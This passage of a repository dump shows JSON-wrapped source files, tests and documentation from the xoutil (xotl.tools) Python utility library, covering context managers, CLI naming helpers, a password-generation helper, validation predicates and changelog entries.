print('In context SOME_CONTEXT')\n In context SOME_CONTEXT\n\n Note the difference creating the context and checking it: for entering a\n context you should use ``context(name)`` for testing whether some piece of\n code is being executed inside a context you should use ``context[name]``;\n you may also use the syntax `name in context`.\n\n When an existing context is re-enter, the former one is reused.\n Nevertheless, the data stored in each context is local to each level.\n\n For example::\n\n >>> with context('A', b=1) as a1:\n ... with context('A', b=2) as a2:\n ... print(a1 is a2)\n ... print(a2['b'])\n ... print(a1['b'])\n True\n 2\n 1\n\n For data access, a mapping interface is provided for all contexts. If a\n data slot is deleted at some level, upper level is used to read\n values. Each new written value is stored in current level without\n affecting upper levels.\n\n For example::\n\n >>> with context('A', b=1) as a1:\n ... with context('A', b=2) as a2:\n ... del a2['b']\n ... print(a2['b'])\n 1\n\n It is an error to *reuse* a context directly like in::\n\n >>> with context('A', b=1) as a1: # doctest: +ELLIPSIS\n ... with a1:\n ... pass\n Traceback (most recent call last):\n ...\n RuntimeError: Entering the same context level twice! 
...\n\n \"\"\"\n\n __slots__ = (\"name\", \"count\")\n\n def __new__(cls, name, **data):\n self = cls[name]\n if not self: # if self is _null_context:\n self = super().__new__(cls)\n super(Context, self).__init__()\n self.name = name\n self.count = 0\n # TODO: Redefine all event management\n return self(**data)\n\n @classmethod\n def from_dicts(cls, ctx, overrides=None, defaults=None):\n \"\"\"Creates a context introducing both defaults and overrides.\n\n This combines both the standard constructor and `from_defaults`:meth:.\n\n If the same key appears in both `overrides` and `defaults`, ignore the\n default.\n\n \"\"\"\n if not overrides:\n overrides = {}\n if not defaults:\n defaults = {}\n current = cls[ctx]\n current_attrs = dict(current) if current else {}\n attrs = dict(defaults, **current_attrs)\n attrs.update(overrides)\n return cls(ctx, **attrs)\n\n @classmethod\n def from_defaults(cls, ctx, **defaults):\n \"\"\"Creates context `ctx` introducing only new keys given in `defaults`.\n\n The normal behavior when you enter a new level in the context is to\n override the values with the new one.\n\n Example:\n\n >>> with context.from_defaults('A', a=1):\n ... with context.from_defaults('A', a=2, b=1) as c:\n ... assert c['a'] == 1\n\n \"\"\"\n return cls.from_dicts(ctx, defaults=defaults)\n\n def __init__(self, *args, **kwargs):\n \"\"\"Must be defined empty for `__new__` parameters compatibility.\n\n Using generic parameters definition allow any redefinition of this\n class can use this `__init__`.\n\n \"\"\"\n\n def __call__(self, **data):\n \"\"\"Allow re-enter in a new level to an already assigned context.\"\"\"\n self.push_level(**data)\n return self\n\n def __nonzero__(self):\n return bool(self.count)\n\n __bool__ = __nonzero__\n\n def __enter__(self):\n if self.count == 0:\n _data.contexts[self.name] = self\n if self.count + 1 == self.level:\n self.count += 1\n return self\n else:\n msg = \"Entering the same context level twice! 
-- c(%s, %d, %d)\"\n raise RuntimeError(msg % (self.name, self.count, self.level))\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.count -= 1\n if self.count == 0:\n del _data.contexts[self.name]\n self.pop_level()\n return False\n\n\n# A simple alias for Context\ncontext = Context\n\n\nclass NullContext(Mapping):\n \"\"\"Singleton context to be used (returned) as default when no one is\n defined.\n\n \"\"\"\n\n __slots__ = ()\n\n instance = None\n name = \"\"\n\n def __new__(cls):\n if cls.instance is None:\n cls.instance = super().__new__(cls)\n return cls.instance\n\n def __len__(self):\n return 0\n\n def __iter__(self):\n return iter(())\n\n def __getitem__(self, key):\n raise KeyError(key)\n\n def __nonzero__(self):\n return False\n\n __bool__ = __nonzero__\n\n def __enter__(self):\n return _null_context\n\n def __exit__(self, exc_type, exc_value, traceback):\n return False\n\n def get(self, name, default=None):\n return default\n\n @property\n def level(self):\n return 0\n\n\n_null_context = NullContext()\n" }, { "alpha_fraction": 0.46341463923454285, "alphanum_fraction": 0.4674796760082245, "avg_line_length": 17.923076629638672, "blob_id": "cc411f5ab3b73ddb454fd70ad6b55fb8fb15ca26", "content_id": "b63dfcdbfa6c58a5edcb64f7fd9aff8efbb75734", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 246, "license_type": "permissive", "max_line_length": 66, "num_lines": 13, "path": "/docs/source/xotl.tools/values.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.values`:mod: -- coercers (or checkers) for value types\n==================================================================\n\n.. automodule:: xotl.tools.values\n :members:\n\nContents:\n\n.. 
toctree::\n :maxdepth: 1\n :glob:\n\n values/*\n" }, { "alpha_fraction": 0.704081654548645, "alphanum_fraction": 0.7346938848495483, "avg_line_length": 48, "blob_id": "fa2b37e9bceaa32a1a6a72787c96b4c0bcaded51", "content_id": "46c8e3e123a1b8c2afbaab096bdcf32a4905f868", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 98, "license_type": "permissive", "max_line_length": 71, "num_lines": 2, "path": "/docs/source/history/_changes-1.8.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #28: `xoutil.future.inspect.getattr_static`:func: failed with\n Python's 2 old classes.\n" }, { "alpha_fraction": 0.5452355742454529, "alphanum_fraction": 0.5532655119895935, "avg_line_length": 27.961240768432617, "blob_id": "e83d687e24c0f7f8784316dcfda3c6b938fa6f70", "content_id": "0a420c7c56c42b80c0c4890fb5ec31c13520b586", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3739, "license_type": "no_license", "max_line_length": 78, "num_lines": 129, "path": "/xotl/tools/cli/tools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nr\"\"\"Utilities for command-line interface (CLI) applications.\n\n- `program_name`:func:\\ : calculate the program name from \"sys.argv[0]\".\n\n- `command_name`:func:\\ : calculate command names using class names in lower\n case inserting a hyphen before each new capital letter.\n\n\"\"\"\n\n\ndef hyphen_name(name, join_numbers=True):\n \"\"\"Convert a name to a hyphened slug.\n\n Expects a `name` in Camel-Case. 
All invalid characters (those invalid in\n Python identifiers) are ignored. Numbers are joined with preceding part\n when `join_numbers` is True.\n\n For example::\n\n >>> hyphen_name('BaseNode') == 'base-node'\n True\n\n >> hyphen_name('--__ICQNámeP12_34Abc--') == 'icq-name-p12-34-abc'\n True\n\n >> hyphen_name('ICQNámeP12', join_numbers=False) == 'icq-name-p-12'\n True\n\n \"\"\"\n import re\n from xotl.tools.string import force_ascii\n\n name = force_ascii(name)\n regex = re.compile(\"[^A-Za-z0-9]+\")\n name = regex.sub(\"-\", name)\n regex = re.compile(\"([A-Z]+|[a-z]+|[0-9]+|-)\")\n all = regex.findall(name)\n i, count, parts = 0, len(all), []\n while i < count:\n part = all[i]\n if part != \"-\":\n upper = \"A\" <= part <= \"Z\"\n if upper:\n part = part.lower()\n j = i + 1\n if j < count and upper and \"a\" <= all[j] <= \"z\":\n aux = part[:-1]\n if aux:\n parts.append(aux)\n part = part[-1] + all[j]\n i = j\n j += 1\n if j < count and \"0\" <= all[j] <= \"9\" and join_numbers:\n part = part + all[j]\n i = j\n parts.append(part)\n i += 1\n return \"-\".join(parts)\n\n\ndef program_name():\n \"\"\"Calculate the program name from \"sys.argv[0]\".\"\"\"\n # TODO: Use 'argparse' standard (parser.prog)\n import sys\n from os.path import basename\n\n return basename(sys.argv[0])\n\n\ndef command_name(cls):\n \"\"\"Calculate a command name from given class.\n\n Names are calculated putting class names in lower case and inserting\n hyphens before each new capital letter. For example \"MyCommand\" will\n generate \"my-command\".\n\n It's defined as an external function because a class method don't apply to\n minimal commands (those with only the \"run\" method).\n\n Example::\n\n >>> class SomeCommand:\n ... pass\n\n >>> command_name(SomeCommand) == 'some-command'\n True\n\n If the command class has an attribute `command_cli_name`, this will be\n used instead::\n\n >>> class SomeCommand:\n ... 
command_cli_name = 'adduser'\n\n >>> command_name(SomeCommand) == 'adduser'\n True\n\n It's an error to have a non-string `command_cli_name` attribute::\n\n >>> class SomeCommand:\n ... command_cli_name = None\n\n >>> command_name(SomeCommand) # doctest: +ELLIPSIS\n Traceback (most recent call last):\n ...\n TypeError: Attribute 'command_cli_name' must be a string.\n\n \"\"\"\n unset = object()\n names = (\"command_cli_name\", \"__command_name__\")\n i, res = 0, unset\n while i < len(names) and res is unset:\n name = names[i]\n res = getattr(cls, names[i], unset)\n if res is unset:\n i += 1\n elif not isinstance(res, str):\n raise TypeError(\"Attribute '{}' must be a string.\".format(name))\n if res is unset:\n res = hyphen_name(cls.__name__)\n return res\n" }, { "alpha_fraction": 0.6408554315567017, "alphanum_fraction": 0.6476770043373108, "avg_line_length": 31.479042053222656, "blob_id": "85da3f9192576a316ec2ec93cb27b5f077c44d8f", "content_id": "c48f27518341ee9fba0ac593fe179d00fb002f88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5425, "license_type": "no_license", "max_line_length": 78, "num_lines": 167, "path": "/xotl/tools/crypto.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"General security tools.\n\nAdds the ability to generate new passwords using a source pass-phrase and a\nsecury strong level.\n\n\"\"\"\n\n\n__all__ = (\n \"PASS_PHRASE_LEVEL_BASIC\",\n \"PASS_PHRASE_LEVEL_MAPPED\",\n \"PASS_PHRASE_LEVEL_MAPPED_MIXED\",\n \"PASS_PHRASE_LEVEL_MAPPED_DATED\",\n \"PASS_PHRASE_LEVEL_STRICT\",\n \"generate_password\",\n)\n\n\n#: The most basic level (less ) for the password 
generation.\nPASS_PHRASE_LEVEL_BASIC = 0\n\n#: A level for simply mapping of several chars.\nPASS_PHRASE_LEVEL_MAPPED = 1\n\n#: Another \"stronger\" mapping level.\nPASS_PHRASE_LEVEL_MAPPED_MIXED = 2\n\n#: Appends the year after mapping.\nPASS_PHRASE_LEVEL_MAPPED_DATED = 3\n\n#: Totally scramble the result, making very hard to predict the result.\nPASS_PHRASE_LEVEL_STRICT = 4\n\n#: The default level for `generate_password`:func:\nDEFAULT_PASS_PHRASE_LEVEL = PASS_PHRASE_LEVEL_MAPPED_DATED\n\n\n#: A mapping from names to standards levels. You may use these strings as\n#: arguments for `level` in `generate_password`:func:.\nPASS_LEVEL_NAME_MAPPING = {\n \"basic\": PASS_PHRASE_LEVEL_BASIC,\n \"mapped\": PASS_PHRASE_LEVEL_MAPPED,\n \"mixed\": PASS_PHRASE_LEVEL_MAPPED_MIXED,\n \"dated\": PASS_PHRASE_LEVEL_MAPPED_DATED,\n \"random\": PASS_PHRASE_LEVEL_STRICT,\n}\n\n\nBASIC_PASSWORD_SIZE = 4 # bytes\n\n#: An upper limit for generated password length.\nMAX_PASSWORD_SIZE = 512\n\n\nSAMPLE = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\"\n\n\ndef _normalize_level(level):\n \"\"\"Normalize the `level` argument.\n\n If passed a string, it must be a key in `PASS_LEVEL_NAME_MAPPING`:obj:.\n Otherwise it must be a valid level number.\n\n \"\"\"\n if isinstance(level, str):\n return PASS_LEVEL_NAME_MAPPING[level]\n else:\n return level\n\n\ndef generate_password(pass_phrase, level=DEFAULT_PASS_PHRASE_LEVEL):\n \"\"\"Generate a password from a source `pass-phrase` and a security `level`.\n\n :param pass_phrase: String pass-phrase to be used as base of password\n generation process.\n\n :param level: Numerical security level (the bigger the more secure, but\n don't exaggerate!).\n\n When `pass_phrase` is a valid string, `level` means a generation method.\n Each level implies all other with an inferior numerical value.\n\n There are several definitions with numerical values for `level` (0-4):\n\n `PASS_PHRASE_LEVEL_BASIC`:data:\n\n Generate the same pass-phrase, 
just removing invalid characters and\n converting the result to lower-case.\n\n `PASS_PHRASE_LEVEL_MAPPED`:data:\n\n Replace some characters with new values: ``'e'->'3'``, ``'i'->'1'``,\n ``'o'->'0'``, ``'s'->'5'``.\n\n `PASS_PHRASE_LEVEL_MAPPED_MIXED`:data:\n\n Consonants characters before 'M' (included) are converted to\n upper-case, all other are kept lower-case.\n\n `PASS_PHRASE_LEVEL_MAPPED_DATED`:data:\n\n Adds a suffix with the year of current date (\"<YYYY>\").\n\n `PASS_PHRASE_LEVEL_STRICT`:data:\n\n Randomly scramble previous result until unbreakable strong password is\n obtained.\n\n If `pass_phrase` is ``None`` or an empty string, generate a \"secure salt\"\n (a password not based in a source pass-phrase). A \"secure salt\" is\n generated by scrambling the concatenation of a random phrases from the\n alphanumeric vocabulary.\n\n Returned password size is ``4*level`` except when a `pass-phrase` is given\n for `level` <= 4 where depend on the count of valid characters of\n `pass-phrase` argument, although minimum required is warranted. When\n `pass-phrase` is ``None`` for `level` zero or negative, size ``4`` is\n assumed. 
First four levels are considered weak.\n\n Maximum size is defined in the :data:`MAX_PASSWORD_SIZE` constant.\n\n Default level is :data:`PASS_PHRASE_LEVEL_MAPPED_DATED` when using a\n pass-phrase.\n\n \"\"\"\n from random import sample, randint\n from xotl.tools.string import slugify\n\n level = _normalize_level(level)\n size = MAX_PASSWORD_SIZE + 1 # means, return all calculated\n required = min(max(level, 1) * BASIC_PASSWORD_SIZE, MAX_PASSWORD_SIZE)\n if pass_phrase:\n # PASS_PHRASE_LEVEL_BASIC\n res = slugify(pass_phrase, \"\", invalid_chars=\"_\")\n if level >= PASS_PHRASE_LEVEL_MAPPED:\n for (old, new) in (\"e3\", \"i1\", \"o0\", \"s5\"):\n res = res.replace(old, new)\n if level >= PASS_PHRASE_LEVEL_MAPPED_MIXED:\n for new in \"BCDFGHJKLM\":\n old = new.lower()\n res = res.replace(old, new)\n if level >= PASS_PHRASE_LEVEL_MAPPED_DATED:\n from datetime import datetime\n\n today = datetime.today()\n res += today.strftime(\"%Y\")\n if level >= PASS_PHRASE_LEVEL_STRICT:\n size = required\n else:\n size = required\n count = randint(BASIC_PASSWORD_SIZE, 2 * BASIC_PASSWORD_SIZE)\n res = \"\".join(sample(SAMPLE, count))\n if size <= MAX_PASSWORD_SIZE:\n if len(res) < size:\n needed = (size - len(res)) // BASIC_PASSWORD_SIZE + 1\n res += generate_password(None, needed)\n res = \"\".join(sample(res, size))\n return res[:size]\n" }, { "alpha_fraction": 0.7203682661056519, "alphanum_fraction": 0.7376294732093811, "avg_line_length": 36.78260803222656, "blob_id": "4204179c229fc7343a2dd5cd82287986c024a4f5", "content_id": "ff768c482ecaf6eec423c0e85f2374c3a59862a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 869, "license_type": "no_license", "max_line_length": 95, "num_lines": 23, "path": "/README.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xoutil` is a collection of disparate utilities that does not conform a\nframework for anything. 
`xoutil` is essentially -but not exclusively- an\nextension to the Python's standard library.\n\nIn `xoutil` you will probably find:\n\n- Tools that must be implemented in the Python Standard Library, but there are\n things that escape from the Guido's scope. ;)\n\n- Components that belong naturally to the \"Common Systems Layer\" \\\n [#continuum]_.\n\n- Compatibility solvers for major versions issues\\ [#another-six]_. See\n `xoutil.eight`.\n\n .. note:: Starting with xoutil 2.0, support for Python 2 is no longer\n supported. Use a version of xoutil 1.9.x to have the latest developments\n with Python 2 support.\n\n\n.. [#another-six] Yes!, yet another solution for this. ;)\n\n.. [#continuum] http://pubs.opengroup.org/architecture/togaf9-doc/arch/chap39.html#tag_39_04_01\n" }, { "alpha_fraction": 0.5144417881965637, "alphanum_fraction": 0.516542375087738, "avg_line_length": 28.295385360717773, "blob_id": "7eee13c45ca02f8cc25276b508230e878c30c78d", "content_id": "d6926e5756a5ba2c4d397b260878f10bba9ffdff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9526, "license_type": "no_license", "max_line_length": 78, "num_lines": 325, "path": "/xotl/tools/fp/prove/semantic.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Prove validity of values - Base predicate classes.\n\nA `predicate`:class: could combine two concepts (*validation* and\n*conversion*) in a single callable object.\n\n\"\"\"\n\n\nclass predicate:\n \"\"\"Base class for value proves using logic predicates.\n\n A predicate could combine two operations on values: *validation*, and\n *conversion*.\n\n To signal that value as invalid, 
a predicate must return the special value\n `_wrong`. Types work as in `isinstance`:func: standard function; callable\n functions mould a parameter value into a definitive form.\n\n To use normal functions as a callable predicate, use `SafeCheck`:class: or\n `LogicalCheck`:class` to wrap them.\n\n When using a list to combine explicitly the two concepts, result of the\n check part is considered Boolean (True or False), and the second part\n alwasy return a moulded value.\n\n When use a predicate, several definitions will be tried until one succeed.\n\n \"\"\"\n\n __slots__ = (\"inner\",)\n\n def __new__(cls, *args):\n if cls is predicate: # Parse the right sub-type\n count = len(args)\n if count == 0:\n msg = \"{}() takes at least 1 argument (0 given)\"\n raise TypeError(msg.format(cls.__name__))\n elif count == 1:\n arg = args[0]\n if isinstance(arg, cls):\n return arg\n elif isinstance(arg, (tuple, type)):\n return TypeCheck(arg)\n elif isinstance(arg, list):\n return CheckAndCast(*arg)\n elif callable(arg):\n return LogicalCheck(arg)\n else:\n msg = \"{}() can't parse a definition of type: {}\"\n aname = type(arg).__name__\n raise TypeError(msg.format(cls.__name__, aname))\n else:\n return MultiCheck(*args)\n else:\n return super().__new__(cls)\n\n def __init__(self, *args):\n pass\n\n def __repr__(self):\n return str(self)\n\n\nclass TypeCheck(predicate):\n \"\"\"Check if value is instance of given types.\"\"\"\n\n __slots__ = ()\n\n def __new__(cls, *args):\n from xotl.tools.params import check_count\n\n check_count(len(args) + 1, 2, caller=cls.__name__)\n if len(args) == 1 and isinstance(args[0], tuple):\n args = args[0]\n if all(isinstance(arg, type) for arg in args):\n self = super().__new__(cls)\n self.inner = args\n return self\n else:\n wrong = (arg for arg in args if not isinstance(arg, type))\n wnames = \", or \".join(type(w).__name__ for w in wrong)\n msg = \"`TypeCheck` allows only valid types, not: ({})\"\n raise TypeError(msg.format(wnames))\n\n 
def __call__(self, value):\n from xotl.tools.fp.option import Just, Wrong\n\n ok = isinstance(value, self.inner)\n return (value if value else Just(value)) if ok else Wrong(value)\n\n def __str__(self):\n return self._str()\n\n def __crop__(self, max_width=None, canonical=False):\n \"\"\"Calculate both string versions (small and normal).\"\"\"\n from xotl.tools.symbols import Undefined\n from xotl.tools.clipping import ELLIPSIS, DEFAULT_MAX_WIDTH\n\n if max_width is None:\n max_width = DEFAULT_MAX_WIDTH # a big number for this\n start, end = \"{}(\".format(type(self).__name__), \")\"\n borders_len = len(start) + len(end)\n sep = \", \"\n res = \"\"\n items = iter(self.inner)\n ok = True\n while ok:\n item = next(items, Undefined)\n if item is not Undefined:\n if res:\n res += sep\n aux = item.__name__\n if len(res) + len(aux) + borders_len <= max_width:\n res += aux\n else:\n res += ELLIPSIS\n ok = False\n else:\n ok = False\n return \"{}{}{}\".format(start, res, end)\n\n\nclass NoneOrTypeCheck(TypeCheck):\n \"\"\"Check if value is None or instance of given types.\"\"\"\n\n __slots__ = ()\n\n def __call__(self, value):\n from xotl.tools.fp.option import Wrong\n\n if value is None:\n _types = self.inner\n i, res = 0, None\n while res is None and i < len(_types):\n try:\n res = _types[i]()\n except Exception:\n pass\n i += 1\n return res if res is not None else Wrong(None)\n else:\n return super().__call__(value)\n\n def __str__(self):\n aux = super().__str__()\n return \"none-or-{}\".format(aux)\n\n\nclass TypeCast(TypeCheck):\n \"\"\"Cast a value to a correct type.\"\"\"\n\n __slots__ = ()\n\n def __call__(self, value):\n from xotl.tools.fp.option import Just\n\n res = super().__call__(value)\n if not res:\n _types = self.inner\n i = 0\n while not res and i < len(_types):\n try:\n res = _types[i](value)\n if not res:\n res = Just(res)\n except Exception:\n pass\n i += 1\n return res\n\n def __str__(self):\n # FIX: change this\n aux = super(NoneOrTypeCheck, 
self).__str__()\n return \"none-or-{}\".format(aux)\n\n\nclass CheckAndCast(predicate):\n \"\"\"Check if value, if valid cast it.\n\n Result value must be valid also.\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, check, cast):\n check = predicate(check)\n if callable(cast):\n self = super().__new__(cls)\n self.inner = (check, SafeCheck(cast))\n return self\n else:\n msg = '{}() expects a callable for cast, \"{}\" given'\n sname = type(self).__name__\n raise TypeError(msg.format(sname, type(cast).__name__))\n\n def __call__(self, value):\n from xotl.tools.fp.option import Wrong\n\n check, cast = self.inner\n aux = check(value)\n if aux:\n res = cast(value)\n if check(res):\n return res\n else:\n res = aux\n if isinstance(res, Wrong):\n return res\n else:\n return Wrong(value)\n\n def __str__(self):\n from xotl.tools.clipping import crop\n\n check, cast = self.inner\n fmt = \"({}(…) if {}(…) else _wrong)\"\n return fmt.format(crop(cast), check)\n\n\nclass FunctionalCheck(predicate):\n \"\"\"Check if value is valid with a callable function.\"\"\"\n\n __slots__ = ()\n\n def __new__(cls, check):\n # TODO: Change next, don't use isinstance\n if isinstance(check, predicate):\n return check\n elif callable(check):\n self = super().__new__(cls)\n self.inner = check\n return self\n else:\n msg = 'a functional check expects a callable but \"{}\" is given'\n raise TypeError(msg.format(type(check).__name__))\n\n def __str__(self):\n from xotl.tools.clipping import crop\n\n suffix = \"check\"\n kind = type(self).__name__.lower()\n if kind.endswith(suffix):\n kind = kind[: -len(suffix)]\n inner = crop(self.inner)\n return \"{}({})()\".format(kind, inner)\n\n\nclass LogicalCheck(FunctionalCheck):\n \"\"\"Check if value is valid with a callable function.\"\"\"\n\n __slots__ = ()\n\n def __call__(self, value):\n from xotl.tools.fp.option import Just, Wrong\n\n try:\n res = self.inner(value)\n if res:\n if isinstance(res, Just):\n return res\n elif res is True:\n return 
Just(value)\n else:\n return res\n elif isinstance(res, Wrong):\n return res\n elif res is False or res is None: # XXX: None?\n return Wrong(value)\n else:\n return Wrong(res)\n except Exception as error:\n return Wrong(error)\n\n\nclass SafeCheck(FunctionalCheck):\n \"\"\"Return a wrong value only if function produce an exception.\"\"\"\n\n __slots__ = ()\n\n def __call__(self, value):\n from xotl.tools.fp.option import Wrong\n\n try:\n return self.inner(value)\n except Exception as error:\n return Wrong(error)\n\n\nclass MultiCheck(predicate):\n \"\"\"Return a wrong value only when all inner predicates fails.\n\n Haskell: guards (pp. 132)\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, *args):\n inner = tuple(predicate(arg) for arg in args)\n self = super().__new__(cls)\n self.inner = inner\n return self\n\n def __call__(self, value):\n from xotl.tools.fp.option import Just, Wrong, none\n\n predicates = self.inner\n i, res = 0, none\n while isinstance(res, Wrong) and i < len(predicates):\n res = predicates[i](value)\n i += 1\n return res.inner if isinstance(res, Just) and res.inner else res\n\n def __str__(self):\n aux = \" OR \".join(str(c) for c in self.inner)\n return \"combo({})\".format(aux)\n" }, { "alpha_fraction": 0.7492354512214661, "alphanum_fraction": 0.7584097981452942, "avg_line_length": 53.5, "blob_id": "0738cf7d73552766a84f41f14829b6cc7159fd43", "content_id": "71e770d2c094be8526577268f5b784a54d7aeaf2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 327, "license_type": "permissive", "max_line_length": 77, "num_lines": 6, "path": "/docs/source/history/_changes-1.6.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Changes the signature of `xoutil.names.nameof`:func:, also the semantics of\n the `full` parameter is improved.\n\n This is the major change in this release. 
Actually, this release has being\n prepared in sync with the release 1.5.6 (just a few days ago) to have this\n change passed while still keeping our versions scheme.\n" }, { "alpha_fraction": 0.47390222549438477, "alphanum_fraction": 0.4962717592716217, "avg_line_length": 26.43181800842285, "blob_id": "2379c4dac34404ea452f7610bac5d07983c5a64f", "content_id": "d91395def2ca49deb818e2e9be5e800b7ae6ed3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1208, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/tests/test_safe.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\nfrom xoutil.tasking.safe import SafeData\n\n\ndef test_safe():\n from xoutil.future.threading import async_call\n from time import sleep\n\n data = {}\n qd = SafeData(data, timeout=5.0)\n\n def inner(name, start, end):\n step = 1 if start < end else -1\n for i in range(start, end, step):\n with qd as d:\n d[i] = d.get(i, 0) + 1\n sleep(0.001 * i)\n with qd as d:\n d[name] = True\n\n one, two = \"one\", \"two\"\n async_call(inner, args=[one, 1, 6])\n async_call(inner, args=[two, 8, 3])\n finish = {one: False, two: False}\n while not (finish[one] and finish[two]):\n with qd as d:\n for k in (one, two):\n if d.get(k):\n finish[k] = True\n sleep(0.001)\n aux = {i: 1 for i in range(1, 6)}\n for i in range(8, 3, -1):\n aux[i] = aux.get(i, 0) + 1\n aux[one] = aux[two] = True\n assert data == aux\n" }, { "alpha_fraction": 0.6282973885536194, "alphanum_fraction": 0.6354916095733643, "avg_line_length": 33.75, "blob_id": "3634497f059923e24687c6f0d21c06ac81648f18", "content_id": 
"d8af61b4d9af18e3d6157ca0eec7a260e8794e19", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 417, "license_type": "permissive", "max_line_length": 74, "num_lines": 12, "path": "/docs/source/xotl.tools/future/pprint.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "``xotl.tools.future.pprint`` - Extension to the data pretty printer\n===================================================================\n\n.. module:: xotl.tools.future.pprint\n\nThis modules includes all the Python's standard library features in module\n`pprint`:mod: and adds the function `ppformat`:func:, which just returns a\nstring of the pretty-formatted object.\n\n.. versionadded:: 1.4.1\n\n.. autofunction:: ppformat\n" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.7407407164573669, "avg_line_length": 31.399999618530273, "blob_id": "2b79751b59b9e3caa6e6c5862cc475d5335c2ad8", "content_id": "4e47f02a315ae8a2861eb69e1a7a814a534032c6", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 162, "license_type": "permissive", "max_line_length": 66, "num_lines": 5, "path": "/docs/source/history/_changes-2.1.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix packaging issue with the namespace 'xotl'.\n\n- Add `xotl.tools.future.itertools.iter_without_duplicates`:func:.\n\n- Add `xotl.tools.fp.tools.constant`:func:.\n" }, { "alpha_fraction": 0.7107208967208862, "alphanum_fraction": 0.7181146144866943, "avg_line_length": 27.473684310913086, "blob_id": "33739ebb0912bb7c562e735e1947cde0f1de4242", "content_id": "585cb0b5a9258af1410bb3b7c256001621f349e2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, 
"is_vendor": false, "language": "reStructuredText", "length_bytes": 1082, "license_type": "permissive", "max_line_length": 78, "num_lines": 38, "path": "/docs/source/history/_changes-1.7.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add `xoutil.collections.PascalSet`:class: and\n `xoutil.collections.BitPascalSet`:class:.\n\n- Add `xoutil.functools.lwraps`:func:.\n\n- Add `xoutil.objects.multi_getter`:func:,\n `xoutil.objects.get_branch_subclasses`:func:,\n `xoutil.objects.fix_method_documentation`:func:.\n\n- Add `xoutil.string.safe_str`:func:\n\n- Remove long deprecated modules: `!xoutil.aop`:mod: and `!xoutil.proxy`:mod:.\n\n- Deprecate ``xoutil.html`` entirely.\n\n- The following modules are included on a *provisional basis*. Backwards\n incompatible changes (up to and including removal of the module) may occur\n if deemed necessary by the core developers:\n\n - `xoutil.connote`:mod:.\n\n - `xoutil.params`:mod:.\n\nFixes in 1.7.1.post1:\n\n- Fix issue with both `xoutil.string.safe_decode`:func: and\n `xoutil.string.safe_encode`:func:.\n\n Previously, the parameter encoding could contain an invalid encoding name\n and the function could fail.\n\n\nFixes in 1.7.1.post2:\n\n- Fix `xoutil.string.cut_suffix`:func:. 
